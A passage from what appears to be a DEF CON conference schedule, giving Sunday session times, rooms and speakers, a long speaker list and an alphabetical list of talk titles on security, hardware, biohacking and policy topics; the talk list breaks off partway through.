WOS - Skyview 6 - Building a Local Passive DNS Tool for Threat Intelligence Research - Kathy Wang
Sunday - 12:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
BHV - Skyview 4 - How to use the Scientific Method in Security Research - Jay Radcliffe
BHV - Skyview 4 - How to use the Scientific Method in Security Research - Jay Radcliffe
CPV - Bronze 1 - "My Usability Goes to 11": A Hacker's Guide to User Experience Research - Greg Norcie - Staff Technologist at Center for Democracy & Technology
CPV - Bronze 2 - Crypto for Criminals: The OPSEC Concerns in Using Cryptography - John Bambenek - Manager of Threat Systems at Fidelis Cybersecurity
CPV - Bronze 2 - Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners - Taylor Hornby, Adam Caudill
DC - DC 101 - So you think you want to be a penetration tester - Anch
DC - Track 1 - Attacking BaseStations - an Odyssey through a Telco's Network - Hendrik Schmidt & Brian Butterly
DC - Track 3 - Game over, man! - Reversing Video Games to Create an Unbeatable AI Player - Dan "AltF4" Petro
DC - Track 2 - Let's Get Physical: Network Attacks Against Physical Security Systems - Ricky "HeadlessZeke" Lawshae
HHV - Contest Area - EagleCAD Basics - Casey
ST - Skyview 3 - Active Incident Response - brain, xian
WOS - Skyview 6 - Music - DJ - VNA
WOS - Skyview 6 - LTE and Its Collective Insecurity - Chuck McAuley and Chris Moore
Sunday - 13:00
Return to Index - Locations Legend
BHV - Skyview 4 - How your doctor might be trying to kill you and how personal genomics can save your life - dlaw and razzies
BHV - Skyview 4 - Neuro Ethics - Dr. Stanislav Naydin and Vlad Gostomelsky
BHV - Skyview 4 - Attention Hackers: Cannabis Needs Your Help! - Michael Zaytsev
BHV - Skyview 4 - Nootropics: Better Living Through Chemistry or Modern-Day Prometheus - GingerBread
BHV - Skyview 4 - How your doctor might be trying to kill you and how personal genomics can save your life - dlaw and razzies
BHV - Skyview 4 - Neuro Ethics - Dr. Stanislav Naydin and Vlad Gostomelsky
CPV - Bronze 2 - Open House - Thank You!
DC - DC 101 - Mouse Jiggler Offense and Defense - Dr. Phil
DC - Track 1 - Can You Trust Autonomous Vehicles: Contactless Attacks ... - Jianhao Liu,Wenyuan Xu,Chen Yan
DC - Track 3 - Backdooring the Frontdoor - Jmaxxz
DC - Track 2 - Drones Hijacking - multi-dimensional attack vectors & countermeasures - Aaron Luo
ST - Skyview 3 - Homologation - Friend or Frenemy? - Shane Kemper, the headless chook
WOS - Skyview 6 - Music - DJ - yurk
WOS - Skyview 6 - Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response - Plug
Sunday - 14:00
Return to Index - Locations Legend
BHV - Skyview 4 - Biohacking Street Law - Victoria Sutton
BHV - Skyview 4 - Biohacking Street Law - Victoria Sutton
DC - DC 101 - Toxic Proxies - Bypassing HTTPS & VPNs to pwn your online identity - Alex Chapman & Paul Stone
DC - Track 1 - Help, I've got ANTs!!! - Tamas Szakaly
DC - Track 3 - VLAN hopping, ARP poisoning & MITM Attacks in Virtualized Environments - Ronny Bull, Dr. Jeanna N. Matthews, Ms. Kaitlin A. Trumbull
DC - Track 2 - An introduction to Pinworm: man in the middle for your metadata - bigezy & saci
WOS - Skyview 6 - Closing Ceremony
Sunday - 15:00
Return to Index - Locations Legend
DC - DC 101 - Auditing 6LoWPAN Networks using Standard Penetration Testing Tools - Jonathan-Christofer Demay
DC - Track 1 - Stumping the Mobile Chipset - Adam Donenfeld
DC - Track 3 - Platform Agnostic Kernel Fuzzing - James Loureiro & Georgi Geshev
DC - Track 2 - Cyber Grand Shellphish - Shellphish Panel
WOS - Skyview 6 - cont...(14:10-15:59) - Closing Ceremony
Sunday - 16:00
Return to Index - Locations Legend
DC - Track 1 - Closing Ceremonies
DC - Track 3 - Closing Ceremonies
DC - Track 2 - Closing Ceremonies
Sunday - 17:00
Return to Index - Locations Legend
Ballys - 'The Office' on the 26th floor - Friends of Bill W.
DC - Track 1 - cont...(16:30-17:59) - Closing Ceremonies
DC - Track 3 - cont...(16:30-17:59) - Closing Ceremonies
DC - Track 2 - cont...(16:30-17:59) - Closing Ceremonies
Speaker List
3AlarmLampScooter
Aamir Lakhani
Aaron Guzman, Principal Penetration Tester
Aaron Luo
Abraxas3d
Adam Caudill
Adam Compton
Adam Donenfeld
Adam Reziouk
Aditya Gupta
Ajit Hatti
Ajit Hatti
AK3R303
Alan
Alex Chapman
Alex Stamos
Ali Ramzoo
Alisha Kloc
Allan Cecil
Amal Graafstra
Amal Graafstra
Amal Graafstra
Amal Graafstra
Amanda Plimpton/Evan Anderson
Amanda Plimpton/Evan Anderson
Amanda Rousseau
Amirali Sanatinia
Amirali Sanatinia
Amrita C. Iyer
Amro Abdelgawad
Anch
Andre McGregor
Andrea Coravos
Andrea Coravos
Andrew Brandt
Andrew Crocker
Andrew Crocker
Andrew Dutcher
Andy Robbins (@_wald0)
Ang Cui
Ankur Tyagi
Anthony Rose
Anthony Rose
Anto Joseph
Antonio Bianchi
Aravind Machiry
Arnaud Lebrun
Arnaud Lebrun
Arnaud Soullie
Arthur Garipov
ashmastaflash
Awesome Folks from Various BioHacking Podcasts
Awesome Folks from Various BioHacking Podcasts
Balint Seeber
Ben Ramsey
Ben Ramsey
Ben Ramsey
Benjamin Holland
Bertin Bervis Bonilla
Bertin Bervis
Bethany Ward
bigezy
Brad Dixon
Brad Woodberg
brain
Brendan Oconnor
Brian Butterly
Brian Butterly
Brian Gorenc
Brian Redbeard
Bryant Zadegan
Buckaroo
c00p3r
c00p3r
Caleb Mays
Candice Schumann
Carl Vincent
Casey
Cassiopiea
Catherine (Kate) Pearce
Cell Wizard
Charles Fracchia
Charles Tritt
Charles Tritt
Chef
Chen Yan
Chet Hosmer
Chris Eagle
Chris Frenz
Chris Frenz
Chris Hadnagy
Chris Moore
Chris Rock
Chris Salls
Christian Dameff
Christian Heinrich
Christian
Christian
Chuck Easttom
Chuck McAuley
CINCVolFLT
Clarence Chio
Cosmo Mielke
Cosmo Mielke
Craig Young
CrYpT
Cyni Winegard
Dallas
Dallas
Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
Dan ‘AltF4’ Petro
Dan Tentler (Viss)
Daniel Grant
Dark Tangent
darkmatter
Darren Kitchen
Darren Lawless
Darren
Darren
Darren
David Bach
David Bach
David Caissy
David Fritz
David Kennedy
David Wong
Dazzle Cat Duo
Dean Pierce
Dean Sysman
DEF CON 101
Deirdre Connolly
Delta Zero
Denis Makrushin
Dennis Maldonado (AKA Linuz)
Dinesh Shetty
Dinesh Shetty
dlaw
dlaw
Dominic White
Doug Weber
Dr. Arati Prabhakar
Dr. Jeanna N. Matthews
Dr. Jeremy Giliula
Dr. Jeremy Giliula
Dr. Paul Vixie
Dr. Phil
Dr. Stan Naydin
Dr. Stanislav Naydin
Dr. Stanislav Naydin
Dr. Thomas P. Keenan
Dragos Boia
Dylan James Smith
Dylan James Smith
Ed Felten
Ed Williams
Ed You
Ed You
Edward You
Eijah
Eijah
Eldar Zaitov
Elizabeth Wharton
Elvis Collado, Praetorian, Senior Security Researcher
Eric Escobar
Erin Jacobs
Erin
Erin
Eva Galperin
Eva Galperin
Evan Booth
Evan Johnson (ejcx_)
Evgeny Sidorov
Fadli Sidek
Fatih Ozavci
Ferdinand Noelscher
Ferdinand Noelscher
Filip Reesalu
Filippo Valsorda
Fish Wang
follower
Francesco Disperati
Francesco Mifsud
Francois Charbonneau
Fred Bret-Mounet
Fritz Sands
Gabriel Ryan
Garett Montgomery
Georgi Geshev
Georgia Weidman
GingerBread
Gingerbread
Gingerbread
Gingerbread
Giovanni Vigna
Gita Ziabari
goldfisk
Granolocks
Grant Bugher
GrayRaven
Grecs
Greg Norcie
Guevara Noubir
Haoqi Shan
Haystack
Henrik Schmidt
HighWiz
Hunter Scott
Hyrum Anderson
Iam McCollum
Idan Revivo
Ignat Korchagin
int0x80
Ioannis Koniaris
J0N J4RV1S
Jacopo Corbetta
Jake Kambic
Jake Kouns
Jake Williams
James Edge
James Jara
James Loureiro
James Powell
Jatin Kataria
Javier Vazquez Vidal
Javier Vazquez Vidal
Jay
Jay Beale
Jay Beale
Jay DiMartino
Jay Healey
Jay Radcliffe
Jay Radcliffe
Jayson Street
Jeff Kitson, Trustwave SpiderLabs, Security Researcher
Jeffrey Tibbetts
Jeffrey Tibbetts
Jen
Jen
Jen
Jennifer S. Granick
Jennifer Szkatulski
Jrmy Matos
Jesse Michael
Jianhao Liu
Jmaxxz
Joe FitzPatrick
Joe FitzPatrick
Joe FitzPatrick
Joe FitzPatrick
Joe FitzPatrick
Joe Gervais (TryCatchHCF)
Joe Grand (Kingpin)
Joe Grand (Kingpin)
Joel Dapello
Joey Muniz
Johanna Curiel
John Bambenek
John Bass
John Bass
John Floren
John Heise
John Poulin
John Spearing
John Sundman
Jonathan Brossard
Jonathan Mayer
Jonathan-Christofer Demay
Jonathan-Christofer Demay
Jose Gutierrez
Joseph Needleman
Joseph Zadeh
joseph
Joshua Drake
Joshua Pereyda
Julian Dana
Julian Dana
Jun Axup
Jun Axup
JusticeBeaver (Eric Escobar)
K2
Kai Zhong
Karl Hiramoto
Karl Kasarda
Karyn Benson
Kat Sweet
Katea Murray
Kathy Wang
Katitza Rodriguez
Katitza Rodriguez
Ke Sun
Ken Belva
Ken Belva
Kenneth Lee
Kenny McElroy
Keoni Gandall
Keoni Gandall
Kevin Borgolte
Kevin Cooper
Kevin Sacco
Kevin Sacco
Kim Zetter
KingPhish3r
Kurt Opsahl
Kurt Opsahl
Ladar Levison
Larry Cashdollar
Larry Pesce
Lennart Koopman
Lizzie Borden
Lorrie Cranor
Lorrie Cranor
LosT
LosT
Louis Auguste
Louis Auguste
Lucas Lundgren
Luke Young
Madhu Akula
Marc Newlin
Marc Newlin
Marc Rogers
Marcello Mansur
Marcello Salvati
Marco Grassi
Mat Caughron (cryptofile)
Matt Cheung
Matt DuHarte
Matt Knight
Matt Knight
Matt Trimble
Matteo Beccaro
Matteo Collura
Matthew Hicks
Mattias Borg
Max Bazaliy
Medic (Tim McGuffin)
Melanie Stegman, Ph.D.
Meow Ludo Meow Meow
Meow Ludo Meow Meow
Michael Hudson
Michael Leibowitz
Michael Zaytsev
Mickey Shkatov
Miguel Antonio Guirao Aguilera
Mike Fauzy
Mike Petruzzi (wiseacre)
Mike Raggo
Mike Raggo
Mike Walker
Mike
Morgan "Indrora" Gangwere
Mr_Br!ml3y
Mr. Br!ml3y
Mr. Br!ml3y
Ms. Kaitlin A. Trumbull
Mudge Zatko
Munin
Nate Cardozo
Nate Cardozo
Nate Cardozo
Nathan Hoch
Neal Hindocha
nephifetnf
NeuroTechX
NeuroTechX
Nezer Zaidenberg (scipio)
nibb13
Nicholas Rosario (MasterChen)
Nick Anderson
Nick Stephens
Nikita Kronenberg
Nir Vailman
Nolan Berry
obiwan666
Omer Zohar
Patrick Mathieu
Patrick Wardle
Patrick Watson
Paul Ashley
Paul Ashley
Paul Dant
Paul Stone
Paulino Calderon
Pen Test Partners
Per Thorsheim
Peter Hefley
Peter Hefley
Petri Koivisto
Phax
Phillip Bosco
Phillip Maddux
Piotr Esden-Tempski
Piotr Esden-Tempski
Plore
Plug
Przemek Jaroszewski
Pyr0
Qidan He
qu0rum
Radia Perlman
Rafael Fontes Souza
Rafael Fontes Souza
Randall Alley
Randall Alley
razzies
razzies
Rear Admiral (ret.) David Simpson, FCC, Bureau Chief
regilero
RenderMan
RenderMan
Renee Wegzyn
Rep. Eric Swalwell (D-CA 15th)
Rep. Will Hurd (R-TX 23rd)
Rich Lee
Rich Mogull
Richard Thieme (Neuralcowboy)
Richard Thieme
Rick Glass
Ricky ‘HeadlessZeke’ Lawshae
Riyaz Walikar
Rob Olson
Robert Anderson
Robert Leale
Robert Simmons
Roberto Giacobazzi
Roberto Giacobazzi
Robin Farmanfarmaian
Robin Farmanfarmaian
Robin Jackson
Rock Stevens
Rod Soto
Rodrigo Maximiano Antunes de Almeida
Rogan Dawes
Rohan Vazarkar (@cptjesus)
Ronny Bull
Ruben Boonen
Rushikesh D. Nandedkar
Ryan Kazanciyan
Ryan Lester
Ryan Mitchell
Ryan O'Shea
Ryan Schmoll
Ryan Schmoll
saci
Salvador Mendoza
Sam Bowne
Sam Bowne
Sarah Zatko
Scott Carlson
Scott Novich
Sean Metcalf
Sean Satterlee (ohm)
Sean Satterlee (ohm)
Seb Kinne
Sebastian Westerhold
Sereyvathana Ty
Seth Wahle
Shaf Patel
Shane Kemper
Shane Steiger, Esq.
Shubham Mittal
Siegfried Rasthofer
Simon Roses
Six_Volts
Skunkworks
Smitty of Halibut, KR6ZY
Sneha Rajguru
Staff
Staff
Staff
Staff
Staff
Staff
Stefan Kiese
Stephan Huber
Stephen Chavez
Steve Christey Coley
Steve Pordon
Steve Weingart
Steven Zani
Tamas Szakaly
Tarah
Taylor Hornby
tb68r
TBA
Terrell McSweeny, Federal Trade Commission, Commissioner
Terrell McSweeny
Tess Schrodinger
Tess Schrodinger
The Bob Ross Fan Club
the headless chook
Thomas Wilhelm
Thomas Wilhelm
Tim ‘t0rch’ Estell
Tim Cannon
Tim Cannon
Tim O'Shea
Tim Quester
Todd Kendall
Tom Hayes
Tom Kopchak
Tom Sellers
Tomohisa Ishikawa
Towne Besel
Travis Lawrence
Travis Lawrence
Trevor Goodman
Trevor Goodman
Trey Blalock (PrivacyGeek)
TryCatchHCF
Tyler Oderkirk
Ulf Frisk
Victoria Sutton
Victoria Sutton
Victoria Sutton
Vincent Canfield
Vivek Notani
Vivek Notani
Vlad Gostomelsky
Vlad Gostomelsky
Vlad Gostomelsky
Vladimir Daschenko
Walt Williams
Wanqiao Zhang
Wenyuan Xu
Wesley McGrew
Weston Hecker
Weston Hecker
Weston Hecker
Weston Hecker
Will Schroeder (@harmj0y)
WIlla Cassandra Riggins(abyssknight)
Willis Vandevanter
xian
Ya Ou
Yan Shoshitaishvili
Yonathan Klijnsma
Zack Fasel
Ze'ev Glozman
Zero_Chaos
Zoz
Talk List
DEFCON-Track One- "Cyber" Who Done It?! Attribution Analysis Through Arrest History
DEFCON-Track One- Robot Hacks Video Games: How TASBot Exploits Consoles with Custom Controllers
CPV-Bronze 1-"My Usability Goes to 11": A Hacker's Guide to User Experience Research
DEFCON-Track Two-(Ab)using Smart Cities: the dark age of modern mobility
SE-Palace 2-5-….and bad mistakes I’ve made a few….
IOT-Bronze 4-0-day Hunting
BHV-Skyview 4-0day for the Soul
DEFCON-DEF CON 101-101 Ways to Brick your Hardware
DEFCON-DEF CON 101-411: A framework for managing security alerts
SE-Palace 2-5-7 Jedi Mind Tricks: Influence Your Target With Out A Word
SkyTalks-Skyview 3-A Guide to Outsmarting the Machines
DEFCON-DEF CON 101-A Journey Through Exploit Mitigation Techniques in iOS
DEFCON-Track Two-A Monitor Darkly: Reversing and Exploiting Ubiquitous...
DEFCON-Track Two-Abusing Bleeding Edge Web Standards for AppSec Glory
SkyTalks-Skyview 3-Accessibility: A Creative Solution to Living Without Sight
SkyTalks-Skyview 3-Active Incident Response
WOS-Skyview 6-Adding Ramparts to Your Bastille: An Introduction to SELinux Hardening
Workshops-Las Vegas Ballroom 7-Advanced Blind SQL Injection Exploitation
SE-Palace 2-5-Advanced social engineering techniques and the rise of cyber scams industrial complex
DEFCON-Track Two-All Your Solar Panels are belong to Me
DEFCON-Track Two-An introduction to Pinworm: man in the middle for your metadata
HHV-Contest Area-An Introduction To Pulling Software From Flash via I2C, SPI and JTAG
Workshops-Las Vegas Ballroom 3-Analyzing Internet Attacks with Honeypots
Demolabs-Table 1-Android-InsecureBank
DEFCON-DEF CON 101-Anti-Forensics AF
Workshops-Las Vegas Ballroom 7-Applied Physical Attacks on Embedded Systems, Introductory Version
SkyTalks-Skyview 3-Art of Espionage (v.303)
CPV-Bronze 2-Ask the EFF: The Year in Digital Civil Liberties
DEFCON-Track Three-Ask the EFF
DEFCON-Track One-Attacking BaseStations - an Odyssey through a Telco's Network
BHV-Skyview 4-Attacking EMR (Electronic Health Records) - Using HL7 and DICOM to Hack Critical Infrastructure
DEFCON-DEF CON 101-Attacking Network Infrastructure to Generate a 4 Tb/s DDoS for $5
WOS-Skyview 6-Attacks on Enterprise Social Media
BHV-Skyview 4-Attention Hackers: Cannabis Needs Your Help!
DEFCON-DEF CON 101-Auditing 6LoWPAN Networks using Standard Penetration Testing Tools
SkyTalks-Skyview 3-Automated DNS Data Exfiltration and Mitigation
WOS-Skyview 6-Automated Dorking for Fun and Profit^WSalary
Demolabs-Table 4-Automated Penetration Tooklit (APT2)
CPV-Bronze 2-Backdooring Cryptocurrencies: The Underhanded Crypto Contest Winners
DEFCON-Track Three-Backdooring the Frontdoor
DEFCON-DEF CON 101-Beyond the MCSE: Red Teaming Active Directory
BHV-Skyview 4-Biohackers Die
BHV-Skyview 4-Biohackers Die
BHV-Skyview 4-BioHacking and Mortal Limitations
BHV-Skyview 4-Biohacking for National Security
BHV-Skyview 4-Biohacking Street Law
BHV-Skyview 4-Biohacking Street Law
BHV-Skyview 4-Biohacking: The Moral Imperative to Build a Better You
BHV-Skyview 4-Biohacking: The Moral Imperative to Build a Better You
BHV-Skyview 4-Biosafety for the Home Enthusiast
BHV-Skyview 4-Biotechnology Needs a Security Patch...Badly
BHV-Skyview 4-Biotechnology Needs a Security Patch...Badly
Wireless-Skyview 1-Blinded by the Light
BHV-Skyview 4-Blockchain's Role in the Disruption of the Medical Industry
BHV-Skyview 4-Blockchain's Role in the Disruption of the Medical Industry
DEFCON-Track Two-BlockFighting with a Hooker -- BlockfFghter2!
Demolabs-Table 3-Boscloner - All in One RFID Cloning Toolkit
Workshops-Las Vegas Ballroom 3-Brainwashing Embedded Systems
CPV-Bronze 2-Breaking Bad Crypto: BB'06 [WORKSHOP]
SkyTalks-Skyview 3-Breaking Payment Points of Interaction
DEFCON-Track Three-Breaking the Internet of Vibrating Things...
DEFCON-DEF CON 101-BSODomizer HD: A mischievous FPGA and HDMI platform for the (m)asses
IOT-Bronze 1-BtleJuice: the Bluetooth Smart Man In The Middle Framework
WOS-Skyview 6-Building a Local Passive DNS Tool for Threat Intelligence Research
HHV-Contest Area-Building malicious hardware out of analog circuits
Demolabs-Table 1-BurpSmartBuster
DEFCON-Track One-Bypassing Captive Portals and Limited Networks
Workshops-Las Vegas Ballroom 1-C/C++ Boot Camp for Hackers
DEFCON-Track Three-CAN i haz car secret plz?
DEFCON-Track One-Can You Trust Autonomous Vehicles: Contactless Attacks ...
DEFCON-Track Three-CANSPY: A Framework for Auditing CAN Devices
Workshops-Las Vegas Ballroom 2-Car Hacking Workshop
DEFCON-Track Three-Cheap Tools for Hacking Heavy Trucks
Demolabs-Table 1-Cloakify Exfiltration Toolset
CPV-Bronze 1-Code breaking - Catching a cheat
DEFCON-Track One-Compelled Decryption - State of the Art in Doctrinal Perversions
BHV-Skyview 4-Computational Chemistry on a Budget
BHV-Skyview 4-Computational Chemistry on a Budget
WOS-Skyview 6-Connections: Eisenhower and the Internet
Demolabs-Table 4-CrackMapExec
WOS-Skyview 6-Crawling for APIs
BHV-Skyview 4-Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science
BHV-Skyview 4-Creating Human 2.0: Three Case Studies from the Edges of Brain Rewiring Science
BHV-Skyview 4-CRISPR/Cas9: Newest Tools for Biohacking fun
CPV-Bronze 2-Crypto for Criminals: The OPSEC Concerns in Using Cryptography
DEFCON-Track Three-Crypto State of the Law
Demolabs-Table 2-CuckooDroid 2.0
DEFCON-Track Three-Cunning with CNG: Soliciting Secrets from Schannel
Workshops-Las Vegas Ballroom 2-Cyber Deception: Hunting advanced attacks with MazeRunner
DEFCON-Track Two-Cyber Grand Shellphish
BHV-Skyview 4-Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode
BHV-Skyview 4-Dangerous Minds Podcast: Live at DCBHV celebrating 100th episode
DEFCON-Track Two-DARPA Cyber Grand Challenge Award Ceremony
Demolabs-Table 2-DataSploit
WOS-Skyview 6-Deceive and Succeed: Measuring the Efficiency of a Deception Eco-System in Post-Breach Detection
Demolabs-Table 6-Deep look at back end systems of the future of credit card fraud.
DEFCON-DEF CON 101-DEF CON 101 Panel
Demolabs-Table 5-DEF CON Wireless Collection Service (DCWCS)
Paris-Le Bar Du Sport-DEFCON 24 Meetup for /r/Defcon
BHV-Skyview 4-Designer Babies
BHV-Skyview 4-Designer Babies
Wireless-Skyview 1-Detecting and Finding Rogue Access Points
DEFCON-Track Three-Developing Managed Code Rootkits for the Java Runtime Environment
DEFCON-Track Three-Direct Memory Attack the Kernel
Demolabs-Table 5-Dirt Simple Comms v2 (DSC2)
Demolabs-Table 3-Disable Single Step Debug with Xmode Code
DEFCON-Track Two-Discovering and Triangulating Rogue Cell Towers
DEFCON-Track Two-DIY Nukeproofing: a new dig at "data-mining"
BHV-Skyview 4-DIYBioweapons and Regulation
BHV-Skyview 4-DIYBioweapons and Regulation
Demolabs-Table 2-DNS Analyse
SkyTalks-Skyview 3-DNS Greylisting for Phun and Phishing Prevention
SE-Palace 2-5-Does Cultural differences become a barrier for social engineering?
Wireless-Skyview 1-Drone Hijacking and other IoT hacking with GNU Radio and XTRX SDR
DEFCON-Track Two-Drones Hijacking - multi-dimensional attack vectors & countermeasures
WOS-Skyview 6-Dynamic Population Discovery for Lateral Movement Detection (Using Machine Learning)
HHV-Contest Area-EagleCAD Basics
Workshops-Las Vegas Ballroom 6-Embedded system design: from electronics to microkernel development
Demolabs-Table 6-Emo-Tool/OldYeller/Ransomware-Simulator
DEFCON-DEF CON 101-Escaping The Sandbox By Not Breaking It
DEFCON-DEF CON 101-Esoteric Exfiltration
BHV-Skyview 4-Ethical Challenges & Responsibilities of Biohackers and Artists
Wireless-Skyview 1-Evil ESP
DEFCON-Track Three-Examining the Internet's pollution
Workshops-Las Vegas Ballroom 4-Exploit Development for Beginners
IOT-Bronze 4-Exploiting a Smart Fridge: a Case Study in Kinetic Cyber
DEFCON-Track Three-Exploiting and attacking seismological networks.. remotely
BHV-Skyview 4-Fancy Dancy Implanty
IOT-Bronze 4-FCC 5G/IoT Security Policy Objectives
DEFCON-Track One-Feds and 0Days: From Before Heartbleed to After FBI-Apple
WOS-Skyview 6-Fiddler on the Roof: A No-Nonsense Look at Fiddler and Its Usage
SkyTalks-Skyview 3-Financial Crime: Past, Present, and Future
BHV-Skyview 4-Flavor-Tripping: a Whole New Way to Taste!
DEFCON-Track One-Forcing a Targeted LTE Cellphone into Unsafe Network
SkyTalks-Skyview 3-Front Door Nightmare
DEFCON-Track One-Frontrunning The Frontrunners
BHV-Skyview 4-Future Grind
Workshops-Las Vegas Ballroom 5-Fuzzing Android Devices
WOS-Skyview 6-Fuzzing For Humans: Real Fuzzing in the Real World
DEFCON-Track Three-Game over, man! - Reversing Video Games to Create an Unbeatable AI Player
CPV-Bronze 2-Getting Started with Cryptography in Python [WORKSHOP]
SkyTalks-Skyview 3-God is a Human II - Artificial Intelligence and the Nature of Reality
Demolabs-Table 3-Graylog
Workshops-Las Vegas Ballroom 1-Guaranteed Security (Session 1)-
Workshops-Las Vegas Ballroom 1-Guaranteed Security (Session 2)-
DEFCON-DEF CON 101-Hacker Fundamentals and Cutting Through Abstraction
DEFCON-Track Three-Hacker-Machine Interface - State of the Union for SCADA HMI Vulnerabilities
DEFCON-Track Two-Hacking Hotel Keys and Point of Sale systems ...
Workshops-Las Vegas Ballroom 6-Hacking Network Protocols using Kali
DEFCON-Track One-Hacking Next-Gen ATM's From Capture to Cashout.
BHV-Skyview 4-Hacking Sensory Perception
BHV-Skyview 4-Hacking the Second Genetic Code using Information Theory
BHV-Skyview 4-Hacking the Second Genetic Code using Information Theory
Wireless-Skyview 1-Handing Full Control of the Radio Spectrum Over to the Machines
Workshops-Las Vegas Ballroom 4-Hands-on Cryptography with Python
BHV-Skyview 4-Health as a service...
BHV-Skyview 4-Health as a service...
DEFCON-Track One-Help, I've got ANTs!!!
DEFCON-Track One-Hiding Wookiees in HTTP - HTTP smuggling...
CPV-Bronze 2-Highlights from the Matasano Challenges [WORKSHOP]
SkyTalks-Skyview 3-Homologation - Friend or Frenemy?
DEFCON-Track One-Honey Onions: Exposing Snooping Tor HSDir Relays
Demolabs-Table 6-HoneyPy and HoneyDB
IOT-Bronze 4-Hot Wheels: Hacking Electronic Wheelchairs
Wireless-Skyview 1-How Do I "BLE Hacking"?
IOT-Bronze 4-How the Smart-City becomes Stupid
CPV-Bronze 1-How to backdoor Diffie-Hellman
DEFCON-Track One-How to design distributed systems resilient despite malicious participants
DEFCON-Track One-How to do it Wrong: Smartphone Antivirus and Security Applications Under Fire
WOS-Skyview 6-How to Find 1,352 WordPress XSS Plugin Vulnerabilities in 1 Hour (not really)
DEFCON-DEF CON 101-How to get good seats in the security theater? Hacking boarding passes for fun & profit.
DEFCON-Track Three-How to Make Your Own DEF CON Black Badge
DEFCON-Track One-How to overthrow a Government
DEFCON-Track One-How To Remote Control An Airliner: Security Flaws in Avionics
SE-Palace 2-5-How to Un-Work your job: Revolutions, Radicals and Engineering by Committee.
BHV-Skyview 4-How to use the Scientific Method in Security Research
BHV-Skyview 4-How to use the Scientific Method in Security Research
BHV-Skyview 4-How your doctor might be trying to kill you and how personal genomics can save your life
BHV-Skyview 4-How your doctor might be trying to kill you and how personal genomics can save your life
WOS-Skyview 6-HTTP/2 & QUIC: Teaching Good Protocols To Do Bad Things
SE-Palace 2-5-Human Hacking: You ARE the weakest link.
BHV-Skyview 4-Human-Human Interface
BHV-Skyview 4-Human-Human Interface
Workshops-Las Vegas Ballroom 3-Hunting Malware at Scale with osquery
Wireless-Skyview 1-I Amateur Radio (And So Can You!)
DEFCON-Track Two-I Fight For The Users, Episode I - Attacks Against Top Consumer Products
DEFCON-Track Three-I've got 99 Problems, but LittleSnitch ain't one
Wireless-Skyview 1-Imagine a Beowulf cluster of Pineapples!
BHV-Skyview 4-Implants: Show and Tell
BHV-Skyview 4-Implants: Show and Tell
BHV-Skyview 4-Implants
BHV-Skyview 4-Implants
BHV-Skyview 4-Implants
WOS-Skyview 6-Incident Code Name: When SkyFalls A Shaken, Not Stirred, James Bond Tale on Incident Response
CPV-Bronze 2-Instegogram: Exploiting Instagram for C2 via Image Steganography
Wireless-Skyview 1-Insteon, Inste-off, Inste-open?
IOT-Bronze 4-Internet of Thieves (or DIY Persistence)
BHV-Skyview 4-Intro to Brain Based Authentication
Workshops-Las Vegas Ballroom 2-Intro to Memory Forensics With Volatility
CPV-Bronze 2-Introducing Man In The Contacts attack to trick encrypted messaging apps
Wireless-Skyview 1-Introducing the HackMeRF
DEFCON-Track Three-Introduction the Wichcraft Compiler Collection : Towards universal code theft
Workshops-Las Vegas Ballroom 6-Introduction to Penetration Testing with Metasploit
Workshops-Las Vegas Ballroom 5-Introduction to x86 disassembly
Workshops-Las Vegas Ballroom 6-Intrusion Prevention System (IPS) Evasion Techniques
IOT-Bronze 1-IoT Defenses - Software, Hardware, Wireless and Cloud
BHV-Skyview 4-IoT of Dongs
BHV-Skyview 4-IoT of Dongs
IOT-Bronze 1-Is Your Internet Light On? Protecting Consumers in the Age of Connected Everything
Wireless-Skyview 1-It's Just Software, Right?
DEFCON-Track One-Jittery MacGyver: Lessons Learned from Building a Bionic Hand out of a Coffee Maker
CPV-Bronze 2-JWTs in a flash!
Wireless-Skyview 1-Kickin' It Old Skool: SDR for Ye Olde Signals
Demolabs-Table 1-LAMMA (beta)
CPV-Bronze 2-Lessons from the Hacking of Ashley Madison
DEFCON-Track Two-Let's Get Physical: Network Attacks Against Physical Security Systems
SkyTalks-Skyview 3-Lie to Me - LIE TO THEM: Chronicles of "How to save $ at the Strip Club"
DEFCON-Track Two-Light-Weight Protocol! Serious Equipment! Critical Implications!
IOT-Bronze 4-Live Drone RF Reverse Engineering
WOS-Skyview 6-LTE and Its Collective Insecurity
DEFCON-DEF CON 101-Machine Duping 101: Pwning Deep Learning Systems
DEFCON-DEF CON 101-Maelstrom - Are You Playing with a Full Deck?...
BHV-Skyview 4-Make your own Brain device
DEFCON-DEF CON 101-Malware Command and Control Channels: A journey into darkness
CPV-Bronze 2-Managing digital codesigning identities in an engineering company
DEFCON-DEF CON 101-Meet the Feds
BHV-Skyview 4-Microscopes are Stupid
BHV-Skyview 4-Microscopes are Stupid
BHV-Skyview 4-Might as well name it Parmigiana, American, Cheddar, and Swiss
BHV-Skyview 4-Might as well name it Parmigiana, American, Cheddar, and Swiss
Demolabs-Table 4-minimega
WOS-Skyview 6-Mining VirusTotal for Operational Data and Applying a Quality Control On It
Workshops-Las Vegas Ballroom 1-Mobile App Attack : Taming the evil app!
DEFCON-DEF CON 101-Mouse Jiggler Offense and Defense
DEFCON-Track Two-MouseJack: Injecting Keystrokes into Wireless Mice
DEFCON-Track Three-Mr. Robot Panel
Wireless-Skyview 1-Multi-channel Wardriving Tools for IEEE 802.15.4 and Beyond
BHV-Skyview 4-My dog is a hacker and will steal your data!
BHV-Skyview 4-My dog is a hacker and will steal your data!
BHV-Skyview 4-Neuro Ethics
BHV-Skyview 4-Neuro Ethics
BHV-Skyview 4-Neurogenic Peptides: Smart Drugs 4-Minute Mile
BHV-Skyview 4-Neurogenic Peptides: Smart Drugs 4-Minute Mile
DEFCON-DEF CON 101-NG9-1-1: The Next Generation of Emergency Ph0nage
Workshops-Las Vegas Ballroom 5-Ninja level Infrastructure Monitoring : Defensive approach to Security Monitoring & Automation
Workshops-Las Vegas Ballroom 5-Nmap NSE development for offense and defense
BHV-Skyview 4-Nootropics: Better Living Through Chemistry or Modern-Day Prometheus
WOS-Skyview 6-Now You See Me, Now You Don't
DEFCON-DEF CON 101-NPRE - Eavesdropping on the Machines
CPV-Bronze 2-Oops, I Cracked My PANs
Workshops-Las Vegas Ballroom 7-Open Source Malware Lab
